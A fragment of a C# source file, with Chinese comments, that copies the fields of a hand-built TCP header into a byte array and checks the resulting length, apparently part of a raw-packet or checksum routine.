490 Array.Copy(b_tch_dport, 0, buffer, index, b_tch_dport.Length);
491 index += b_tch_dport.Length;
492 Array.Copy(b_tch_seq, 0, buffer, index, b_tch_seq.Length);
493 index += b_tch_seq.Length;
494
495
496
497 Array.Copy(b_tch_ack, 0, buffer, index, b_tch_ack.Length);
498 index += b_tch_ack.Length;
499 Array.Copy(b_tch_lenres, 0, buffer, index, b_tch_lenres.Length);
500 index += b_tch_lenres.Length;
501 Array.Copy(b_tch_flag, 0, buffer, index, b_tch_flag.Length);
502 index += b_tch_flag.Length;
503
504 Array.Copy(b_tch_win, 0, buffer, index, b_tch_win.Length);
505 index += b_tch_win.Length;
506 Array.Copy(b_tch_sum, 0, buffer, index, b_tch_sum.Length);
507 index += b_tch_sum.Length;
508 Array.Copy(b_tch_urp, 0, buffer, index, b_tch_urp.Length);
509 index += b_tch_urp.Length;
510 if (index != size)
511 {
512
513
514 rtn = -1;
515 return rtn;
516 }
517 else
518 {
519
520 rtn = index;
521 return rtn;
522 }
523 }
524 //这个是把tcp部分转为字节数组用的,因为这个要用到2次就不把这个和伪首部放一块了。
525 }
526 }
527
528
529 //最后,本代码校验部分的方法参考了用c#实现ping程序的文章
530